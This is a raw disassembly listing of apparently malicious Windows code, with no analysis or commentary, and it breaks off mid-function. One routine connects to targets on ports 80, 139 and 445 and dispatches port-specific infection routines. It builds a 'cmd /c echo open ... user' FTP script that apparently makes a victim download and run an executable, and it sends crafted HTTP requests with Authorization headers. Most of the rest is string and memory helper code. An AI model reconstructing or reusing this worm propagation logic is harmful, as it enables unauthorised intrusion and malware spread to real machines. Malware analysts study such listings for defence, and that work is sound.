lea ecx, [ebp+var_1C]
call sub_40DDD7
push eax
lea ecx, [ebp+arg_C]
call sub_40DDD7
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi ; Count
push edi ; Dest
call __snprintf
add esp, 14h
push 0
push esi
push edi
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, esi
jz short loc_40DADA
xor bl, bl
jmp short loc_40DADC
; ---------------------------------------------------------------------------
loc_40DADA: ; CODE XREF: sub_40DA4E+86�j
mov bl, 1
loc_40DADC: ; CODE XREF: sub_40DA4E+8A�j
push edi ; Memory
call _free
pop ecx
loc_40DAE3: ; CODE XREF: sub_40DA4E+54�j
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_40DD38
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_C]
call sub_40DD38
mov ecx, [ebp+var_C]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40DA4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB0C proc near ; DATA XREF: .data:00448324�o
; .data:00448364�o ...
Dst = byte ptr -424h
var_423 = byte ptr -423h
Dest = byte ptr -395h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
Src = dword ptr -8
Size = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 424h
and [ebp+Dst], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_423]
push 8Fh ; Size
rep stosd
stosw
stosb
lea eax, [ebp+Dst]
push offset dword_448E3C ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, offset Str ; "nlzhxmpyrjsyle.exe"
push eax
push eax
movzx eax, word ptr dword_4E2E18
push eax
push [ebp+arg_0]
call sub_40AF71
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp+Dest]
push 400h ; Count
push eax ; Dest
call __snprintf
add eax, 90h
push eax
lea eax, [ebp+Dst]
push eax
push 164h
lea eax, [ebp+Src]
push offset aSvwfbA ; "SVWf"
push eax
call sub_40D335
xor ebx, ebx
add esp, 30h
cmp [ebp+Size], ebx
jnz short loc_40DBAA
xor eax, eax
jmp loc_40DCB8
; ---------------------------------------------------------------------------
loc_40DBAA: ; CODE XREF: sub_40DB0C+95�j
mov [ebp+var_C], ebx
loc_40DBAD: ; CODE XREF: sub_40DB0C+183�j
test ebx, ebx
jnz loc_40DC95
push 6
push 1
push 2
call ds:dword_4F553C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40DC7D
xor eax, eax
lea edi, [ebp+var_1E]
stosd
push [ebp+arg_A0]
stosd
stosd
stosw
mov [ebp+var_20], 2
call dword_4E30F8 ; htons
mov [ebp+var_1E], ax
lea eax, [ebp+arg_4]
push eax
call dword_4E3138 ; inet_addr
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40DC72
cmp [ebp+arg_A0], 50h
jnz short loc_40DC3A
sub esp, 10h
lea eax, [ebp+var_D]
mov ecx, esp
mov [ebp+var_24], esp
push eax
lea eax, [ebp+arg_4]
push eax
call sub_40DD15
push [ebp+Size]
push [ebp+Src]
push esi
call sub_40DA4E
add esp, 1Ch
jmp short loc_40DC6F
; ---------------------------------------------------------------------------
loc_40DC3A: ; CODE XREF: sub_40DB0C+106�j
cmp [ebp+arg_A0], 8Bh
jnz short loc_40DC54
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; int
call sub_40D839
jmp short loc_40DC6C
; ---------------------------------------------------------------------------
loc_40DC54: ; CODE XREF: sub_40DB0C+138�j
cmp [ebp+arg_A0], 1BDh
jnz short loc_40DC72
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; int
call sub_40D75F
loc_40DC6C: ; CODE XREF: sub_40DB0C+146�j
add esp, 0Ch
loc_40DC6F: ; CODE XREF: sub_40DB0C+12C�j
movzx ebx, al
loc_40DC72: ; CODE XREF: sub_40DB0C+FD�j
; sub_40DB0C+152�j
push esi
call dword_4E3190 ; closesocket
test ebx, ebx
jnz short loc_40DC88
loc_40DC7D: ; CODE XREF: sub_40DB0C+BA�j
push 3E8h
call ds:dword_4F534C ; Sleep
loc_40DC88: ; CODE XREF: sub_40DB0C+16F�j
inc [ebp+var_C]
cmp [ebp+var_C], 2
jl loc_40DBAD
loc_40DC95: ; CODE XREF: sub_40DB0C+A3�j
lea ecx, [ebp+Src]
call sub_40D15A
test ebx, ebx
jz short loc_40DCB6
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_448228[eax]
lea eax, dword_448228[eax]
loc_40DCB6: ; CODE XREF: sub_40DB0C+193�j
mov eax, ebx
loc_40DCB8: ; CODE XREF: sub_40DB0C+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DB0C endp
; =============== S U B R O U T I N E =======================================
sub_40DCBD proc near ; DATA XREF: .data:0043F008�o
call sub_40E2B4
jmp $+5
push offset nullsub_1 ; void (__cdecl *)()
call _atexit
pop ecx
retn
sub_40DCBD endp
; =============== S U B R O U T I N E =======================================
sub_40DCD3 proc near ; CODE XREF: sub_40D8D7+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40E055
mov eax, esi
pop esi
retn 4
sub_40DCD3 endp
; =============== S U B R O U T I N E =======================================
sub_40DCEB proc near ; CODE XREF: sub_40D8D7+152�p
; sub_43A720+3C�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
push 0
mov al, [edi]
mov [esi], al
call sub_40E055
push ds:dword_43C480
mov ecx, esi
push 0
push edi
call sub_40DE66
mov eax, esi
pop edi
pop esi
retn 4
sub_40DCEB endp
; =============== S U B R O U T I N E =======================================
sub_40DD15 proc near ; CODE XREF: sub_40DB0C+118�p
; sub_43A6C0+27�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40E055
push [esp+4+Str] ; Str
mov ecx, esi
call sub_40DF5C
mov eax, esi
pop esi
retn 8
sub_40DD15 endp
; =============== S U B R O U T I N E =======================================
sub_40DD38 proc near ; CODE XREF: sub_40D8D7+161�p
; sub_40DA4E+9C�p ...
push 1
call sub_40E055
retn
sub_40DD38 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DD40(char *Str)
sub_40DD40 proc near ; CODE XREF: sub_40D8D7+11E�p
Src = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Src] ; Str
call sub_40DD5D
pop ecx
push eax ; Size
mov ecx, esi
push [esp+8+Src] ; Src
call sub_40DDFC
pop esi
retn 4
sub_40DD40 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DD5D(char *Str)
sub_40DD5D proc near ; CODE XREF: sub_40DD40+7�p
; sub_40DF5C+7�p
Str = dword ptr 4
push [esp+Str] ; Str
call _strlen
pop ecx
retn
sub_40DD5D endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DD68(size_t Size,int)
sub_40DD68 proc near ; CODE XREF: sub_40D8D7+107�p
; sub_40D8D7+138�p
Size = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_43C480
push ebx
mov ebx, [esp+4+Size]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40DD82
call sub_43A6C0
loc_40DD82: ; CODE XREF: sub_40DD68+13�j
test ebx, ebx
jbe short loc_40DDB6
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40DFA9
test al, al
jz short loc_40DDB6
lea eax, [esp+0Ch+arg_4]
push eax ; int
mov eax, [esi+4]
add eax, [esi+8]
push ebx ; Size
push eax ; Dst
call sub_40DDBE
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DF79
loc_40DDB6: ; CODE XREF: sub_40DD68+1C�j
; sub_40DD68+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40DD68 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DDBE(void *Dst,size_t Size,int)
sub_40DDBE proc near ; CODE XREF: sub_40DD68+3E�p
Dst = dword ptr 4
Size = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
push [esp+Size] ; Size
movsx eax, byte ptr [eax]
push eax ; Val
push [esp+8+Dst] ; Dst
call _memset
add esp, 0Ch
retn
sub_40DDBE endp
; =============== S U B R O U T I N E =======================================
sub_40DDD7 proc near ; CODE XREF: sub_40DA4E+59�p
; sub_40DA4E+62�p ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_40DDE3
call sub_40E04F
locret_40DDE3: ; CODE XREF: sub_40DDD7+5�j
retn
sub_40DDD7 endp
; =============== S U B R O U T I N E =======================================
sub_40DDE4 proc near ; CODE XREF: sub_40DA4E+32�p
; sub_40DA4E+3C�p
mov eax, [ecx+8]
retn
sub_40DDE4 endp
; =============== S U B R O U T I N E =======================================
sub_40DDE8 proc near ; CODE XREF: sub_40D8D7+33�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp [ecx+0Ch], eax
jnb short locret_40DDF9
push 0
push eax
call sub_40DFA9
locret_40DDF9: ; CODE XREF: sub_40DDE8+7�j
retn 4
sub_40DDE8 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DDFC(void *Src,size_t Size)
sub_40DDFC proc near ; CODE XREF: sub_40DD40+14�p
Src = dword ptr 4
Size = dword ptr 8
mov eax, ds:dword_43C480
push ebx
mov ebx, [esp+4+Size]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40DE16
call sub_43A6C0
loc_40DE16: ; CODE XREF: sub_40DDFC+13�j
test ebx, ebx
jbe short loc_40DE49
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40DFA9
test al, al
jz short loc_40DE49
mov eax, [esi+4]
push ebx ; Size
push [esp+10h+Src] ; Src
add eax, [esi+8]
push eax ; Dst
call sub_40DE51
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DF79
loc_40DE49: ; CODE XREF: sub_40DDFC+1C�j
; sub_40DDFC+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40DDFC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DE51(void *Dst,void *Src,size_t Size)
sub_40DE51 proc near ; CODE XREF: sub_40DDFC+3D�p
; sub_40DE66+D9�p ...
Dst = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push [esp+Size] ; Size
push [esp+4+Src] ; Src
push [esp+8+Dst] ; Dst
call _memcpy
add esp, 0Ch
retn
sub_40DE51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE66 proc near ; CODE XREF: sub_40DCEB+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, ecx
push edi
mov ecx, ebx
call sub_40DF58
cmp eax, [ebp+arg_4]
jnb short loc_40DE82
call sub_43A9C0
loc_40DE82: ; CODE XREF: sub_40DE66+15�j
mov ecx, ebx
call sub_40DF58
mov edi, eax
mov eax, [ebp+arg_4]
sub edi, eax
cmp [ebp+arg_8], edi
jnb short loc_40DE98
mov edi, [ebp+arg_8]
loc_40DE98: ; CODE XREF: sub_40DE66+2D�j
cmp esi, ebx
jnz short loc_40DEBD
push ds:dword_43C480
add edi, eax
mov ecx, esi
push edi
call sub_40E0E5
push [ebp+arg_4]
mov ecx, esi
push 0
call sub_40E0E5
jmp loc_40DF4F
; ---------------------------------------------------------------------------
loc_40DEBD: ; CODE XREF: sub_40DE66+34�j
test edi, edi
jbe short loc_40DF22
mov ecx, ebx
call sub_40DF58
cmp edi, eax
jnz short loc_40DF22
mov ecx, ebx
call sub_40DDD7
push eax
mov ecx, esi
call sub_40E23A
cmp byte ptr [eax], 0FEh
jnb short loc_40DF22
push ebx
push esi
call sub_40E29F
pop ecx
test al, al
pop ecx
jz short loc_40DF22
push 1
mov ecx, esi
call sub_40E055
mov ecx, ebx
call sub_40DDD7
mov ecx, ebx
mov [esi+4], eax
call sub_40DF58
mov ecx, ebx
mov [esi+8], eax
call sub_40E171
push dword ptr [esi+4]
mov ecx, esi
mov [esi+0Ch], eax
call sub_40E23A
inc byte ptr [eax]
jmp short loc_40DF4F
; ---------------------------------------------------------------------------
loc_40DF22: ; CODE XREF: sub_40DE66+59�j
; sub_40DE66+64�j ...
push 1
push edi
mov ecx, esi
call sub_40DFA9
test al, al
jz short loc_40DF4F
push edi ; Size
mov ecx, ebx
call sub_40DDD7
add eax, [ebp+arg_4]
push eax ; Src
push dword ptr [esi+4] ; Dst
call sub_40DE51
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DF79
loc_40DF4F: ; CODE XREF: sub_40DE66+52�j
; sub_40DE66+BA�j ...
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40DE66 endp
; =============== S U B R O U T I N E =======================================
sub_40DF58 proc near ; CODE XREF: sub_40DE66+D�p
; sub_40DE66+1E�p ...
mov eax, [ecx+8]
retn
sub_40DF58 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DF5C(char *Str)
sub_40DF5C proc near ; CODE XREF: sub_40DD15+18�p
; sub_40E24F+34�p
Src = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Src] ; Str
call sub_40DD5D
pop ecx
push eax ; Size
mov ecx, esi
push [esp+8+Src] ; Src
call sub_40E0AF
pop esi
retn 4
sub_40DF5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF79 proc near ; CODE XREF: sub_40DD68+49�p
; sub_40DDFC+48�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
mov [ecx+8], eax
mov ecx, [ecx+4]
lea edx, [ebp+var_1]
add ecx, eax
push edx
push ecx
call sub_40DF9C
pop ecx
pop ecx
leave
retn 4
sub_40DF79 endp
; =============== S U B R O U T I N E =======================================
sub_40DF9C proc near ; CODE XREF: sub_40DF79+18�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
mov al, [eax]
mov [ecx], al
retn
sub_40DF9C endp
; =============== S U B R O U T I N E =======================================
sub_40DFA9 proc near ; CODE XREF: sub_40DD68+28�p
; sub_40DDE8+C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
push edi
mov esi, ecx
call sub_40E15F
mov edi, [esp+0Ch+arg_0]
cmp eax, edi
jnb short loc_40DFC0
call sub_43A6C0
loc_40DFC0: ; CODE XREF: sub_40DFA9+10�j
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz short loc_40E000
push eax
mov ecx, esi
call sub_40E23A
cmp [eax], bl
jz short loc_40E000
push dword ptr [esi+4]
mov ecx, esi
call sub_40E23A
cmp byte ptr [eax], 0FFh
jz short loc_40E000
cmp edi, ebx
jnz short loc_40E03F
push dword ptr [esi+4]
mov ecx, esi
call sub_40E23A
dec byte ptr [eax]
push ebx
loc_40DFF5: ; CODE XREF: sub_40DFA9+63�j
mov ecx, esi
call sub_40E055
loc_40DFFC: ; CODE XREF: sub_40DFA9+68�j
; sub_40DFA9+72�j
xor al, al
jmp short loc_40E049
; ---------------------------------------------------------------------------
loc_40E000: ; CODE XREF: sub_40DFA9+1E�j
; sub_40DFA9+2A�j ...
cmp edi, ebx
jnz short loc_40E01D
cmp [esp+0Ch+arg_4], bl
jz short loc_40E00E
push 1
jmp short loc_40DFF5
; ---------------------------------------------------------------------------
loc_40E00E: ; CODE XREF: sub_40DFA9+5F�j
cmp [esi+4], ebx
jz short loc_40DFFC
push ebx
mov ecx, esi
call sub_40DF79
jmp short loc_40DFFC
; ---------------------------------------------------------------------------
loc_40E01D: ; CODE XREF: sub_40DFA9+59�j
cmp [esp+0Ch+arg_4], bl
jz short loc_40E03A
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40E02F
cmp eax, edi
jnb short loc_40E047
loc_40E02F: ; CODE XREF: sub_40DFA9+80�j
push 1
mov ecx, esi
call sub_40E055
jmp short loc_40E03F
; ---------------------------------------------------------------------------
loc_40E03A: ; CODE XREF: sub_40DFA9+78�j
cmp [esi+0Ch], edi
jnb short loc_40E047
loc_40E03F: ; CODE XREF: sub_40DFA9+3D�j
; sub_40DFA9+8F�j
push edi
mov ecx, esi
call sub_40E175
loc_40E047: ; CODE XREF: sub_40DFA9+84�j
; sub_40DFA9+94�j
mov al, 1
loc_40E049: ; CODE XREF: sub_40DFA9+55�j
pop edi
pop esi
pop ebx
retn 8
sub_40DFA9 endp
; =============== S U B R O U T I N E =======================================
sub_40E04F proc near ; CODE XREF: sub_40DDD7+7�p
mov eax, offset dword_43C484
retn
sub_40E04F endp
; =============== S U B R O U T I N E =======================================
sub_40E055 proc near ; CODE XREF: sub_40DCD3+D�p
; sub_40DCEB+E�p ...
arg_0 = byte ptr 4
push ebx
xor ebx, ebx
cmp [esp+4+arg_0], bl
push esi
mov esi, ecx
jz short loc_40E0A1
mov eax, [esi+4]
cmp eax, ebx
jz short loc_40E0A1
push eax
call sub_40E23A
cmp [eax], bl
jz short loc_40E08F
push dword ptr [esi+4]
mov ecx, esi
call sub_40E23A
cmp byte ptr [eax], 0FFh
jz short loc_40E08F
push dword ptr [esi+4]
mov ecx, esi
call sub_40E23A
dec byte ptr [eax]
jmp short loc_40E0A1
; ---------------------------------------------------------------------------
loc_40E08F: ; CODE XREF: sub_40E055+1B�j
; sub_40E055+2A�j
mov eax, [esi+0Ch]
mov ecx, esi
inc eax
inc eax
push eax
mov eax, [esi+4]
dec eax
push eax
call unknown_libname_36 ; Microsoft VisualC 2-8/net runtime
loc_40E0A1: ; CODE XREF: sub_40E055+A�j
; sub_40E055+11�j ...
mov [esi+4], ebx
mov [esi+8], ebx
mov [esi+0Ch], ebx
pop esi
pop ebx
retn 4
sub_40E055 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40E0AF(void *Src,size_t Size)
sub_40E0AF proc near ; CODE XREF: sub_40DF5C+14�p
Src = dword ptr 4
Size = dword ptr 8
push esi
push 1
push [esp+8+Size]
mov esi, ecx
call sub_40DFA9
test al, al
jz short loc_40E0DF
push [esp+4+Size] ; Size
push [esp+8+Src] ; Src
push dword ptr [esi+4] ; Dst
call sub_40DE51
add esp, 0Ch
mov ecx, esi
push [esp+4+Size]
call sub_40DF79
loc_40E0DF: ; CODE XREF: sub_40E0AF+10�j
mov eax, esi
pop esi
retn 8
sub_40E0AF endp
; =============== S U B R O U T I N E =======================================
sub_40E0E5 proc near ; CODE XREF: sub_40DE66+41�p
; sub_40DE66+4D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40E0F8
call sub_43A9C0
loc_40E0F8: ; CODE XREF: sub_40E0E5+C�j
mov ecx, edi
call sub_40E24F
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40E10E
mov ebx, eax
loc_40E10E: ; CODE XREF: sub_40E0E5+25�j
test ebx, ebx
jbe short loc_40E142
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax ; Size
lea eax, [ecx+ebx]
push eax ; Src
push ecx ; Dst
call sub_40E14A
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40DFA9
test al, al
jz short loc_40E142
push esi
mov ecx, edi
call sub_40DF79
loc_40E142: ; CODE XREF: sub_40E0E5+2B�j
; sub_40E0E5+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40E0E5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E14A(void *Dst,void *Src,size_t Size)
sub_40E14A proc near ; CODE XREF: sub_40E0E5+3A�p
Dst = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push [esp+Size] ; Size
push [esp+4+Src] ; Src
push [esp+8+Dst] ; Dst
call _memcpy_0
add esp, 0Ch
retn
sub_40E14A endp
; =============== S U B R O U T I N E =======================================
sub_40E15F proc near ; CODE XREF: sub_40DFA9+5�p
; sub_40E175+1E�p
call sub_40E29B
cmp eax, 2
ja short loc_40E16D
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_40E16D: ; CODE XREF: sub_40E15F+8�j
add eax, 0FFFFFFFEh
retn
sub_40E15F endp
; =============== S U B R O U T I N E =======================================
sub_40E171 proc near ; CODE XREF: sub_40DE66+A6�p
mov eax, [ecx+0Ch]
retn
sub_40E171 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E175 proc near ; CODE XREF: sub_40DFA9+99�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_43BAB4
call __EH_prolog
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
mov [ebp+var_10], esp
mov [ebp+var_14], esi
or edi, 1Fh
call sub_40E15F
cmp eax, edi
jnb short loc_40E19F
mov edi, [ebp+arg_0]
loc_40E19F: ; CODE XREF: sub_40E175+25�j
and [ebp+var_4], 0
lea eax, [edi+2]
push 0
push eax
mov ecx, esi
call sub_40E28B
mov [ebp+arg_0], eax
jmp short loc_40E1D8
; ---------------------------------------------------------------------------
loc_40E1B5: ; DATA XREF: .rdata:0043E3EC�o
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [ebp+var_18], eax
add eax, 2
push 0
push eax
call sub_40E28B
mov [ebp+arg_0], eax
mov eax, offset loc_40E1D2
retn
; ---------------------------------------------------------------------------
loc_40E1D2: ; DATA XREF: sub_40E175+57�o
mov esi, [ebp+var_14]
mov edi, [ebp+var_18]
loc_40E1D8: ; CODE XREF: sub_40E175+3E�j
mov eax, [esi+8]
or [ebp+var_4], 0FFFFFFFFh
test eax, eax
jbe short loc_40E1FA
cmp eax, edi
jbe short loc_40E1E9
mov eax, edi
loc_40E1E9: ; CODE XREF: sub_40E175+70�j
push eax ; Size
mov eax, [ebp+arg_0]
push dword ptr [esi+4] ; Src
inc eax
push eax ; Dst
call sub_40DE51
add esp, 0Ch
loc_40E1FA: ; CODE XREF: sub_40E175+6C�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40E055
mov eax, [ebp+arg_0]
mov ecx, esi
inc eax
push eax
mov [esi+4], eax
call sub_40E23A
and byte ptr [eax], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40E221
mov edi, ebx
loc_40E221: ; CODE XREF: sub_40E175+A8�j
push edi
mov ecx, esi
call sub_40DF79
mov ecx, [ebp+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40E175 endp
; =============== S U B R O U T I N E =======================================
sub_40E23A proc near ; CODE XREF: sub_40DE66+70�p
; sub_40DE66+B3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
retn 4
sub_40E23A endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_36. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40E24F proc near ; CODE XREF: sub_40E0E5+15�p
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_40E289
push eax
call sub_40E23A
cmp byte ptr [eax], 0
jz short loc_40E289
push dword ptr [esi+4]
mov ecx, esi
call sub_40E23A
cmp byte ptr [eax], 0FFh
jz short loc_40E289
push edi
mov edi, [esi+4]
push 1
mov ecx, esi
call sub_40E055
push edi ; Str
mov ecx, esi
call sub_40DF5C
pop edi
loc_40E289: ; CODE XREF: sub_40E24F+8�j
; sub_40E24F+13�j ...
pop esi
retn
sub_40E24F endp
; =============== S U B R O U T I N E =======================================
sub_40E28B proc near ; CODE XREF: sub_40E175+36�p
; sub_40E175+4F�p
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40E2A2
pop ecx
pop ecx
retn 8
sub_40E28B endp
; =============== S U B R O U T I N E =======================================
sub_40E29B proc near ; CODE XREF: sub_40E15F�p
or eax, 0FFFFFFFFh
retn
sub_40E29B endp
; =============== S U B R O U T I N E =======================================
sub_40E29F proc near ; CODE XREF: sub_40DE66+7C�p
mov al, 1
retn
sub_40E29F endp
; =============== S U B R O U T I N E =======================================
sub_40E2A2 proc near ; CODE XREF: sub_40E28B+6�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jge short loc_40E2AC
xor eax, eax
loc_40E2AC: ; CODE XREF: sub_40E2A2+6�j
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
retn
sub_40E2A2 endp
; =============== S U B R O U T I N E =======================================
sub_40E2B4 proc near ; CODE XREF: sub_40DCBD�p
; unknown_libname_35+3�p
test byte_4F38AC, 1
jnz short locret_40E2C4
or byte_4F38AC, 1
locret_40E2C4: ; CODE XREF: sub_40E2B4+7�j
retn
sub_40E2B4 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E2C6 proc near ; DATA XREF: .data:0043F00C�o
jmp $+5
sub_40E2C6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E2CB proc near
mov eax, dword_4490F8
add eax, 6
mov dword_4E5E34, eax
retn
sub_40E2CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E2D9(int,char,int,__int16,int,size_t Size,int,void *Src,void *Memory,int,char)
sub_40E2D9 proc near ; CODE XREF: sub_40E2D9+D0�p
; sub_40E3C7+474�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
Size = dword ptr 1Ch
Src = dword ptr 24h
Memory = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_40E2ED
or [ebp+arg_7], 1
jmp short loc_40E2F1
; ---------------------------------------------------------------------------
loc_40E2ED: ; CODE XREF: sub_40E2D9+C�j
and [ebp+arg_7], 0FEh
loc_40E2F1: ; CODE XREF: sub_40E2D9+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+Memory]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40E315
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+Size], ebx
mov [ebp+arg_C], ax
jmp short loc_40E327
; ---------------------------------------------------------------------------
loc_40E315: ; CODE XREF: sub_40E2D9+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+Size], eax
mov [ebp+arg_2B], 1
loc_40E327: ; CODE XREF: sub_40E2D9+3A�j
movzx eax, [ebp+arg_C]
push eax ; Size
mov [ebp+var_4], eax
call _malloc
test eax, eax
pop ecx
mov [ebp+Memory], eax
jz loc_40E3C0
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+Size]
mov esi, [ebp+Src]
push edi ; Size
add eax, 18h
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+Memory]
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_40E3B7
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40E3B7
push [ebp+Memory] ; Memory
call _free
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40E3B3
push 0 ; char
sub ebx, edi
push [ebp+arg_24] ; int
add edi, esi
lea esi, [ebp+arg_4]
push ebx ; Memory
push edi ; Src
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0] ; int
rep movsd
call sub_40E2D9
add esp, 2Ch
jmp short loc_40E3C2
; ---------------------------------------------------------------------------
loc_40E3B3: ; CODE XREF: sub_40E2D9+B3�j
mov al, 1
jmp short loc_40E3C2
; ---------------------------------------------------------------------------
loc_40E3B7: ; CODE XREF: sub_40E2D9+9C�j
; sub_40E2D9+A4�j
push [ebp+Memory] ; Memory
call _free
pop ecx
loc_40E3C0: ; CODE XREF: sub_40E2D9+61�j
xor al, al
loc_40E3C2: ; CODE XREF: sub_40E2D9+D8�j
; sub_40E2D9+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E2D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E3C7(char *Size,void *Memory)
sub_40E3C7 proc near ; CODE XREF: sub_40E9BD+B�p
var_60F0 = qword ptr -60F0h
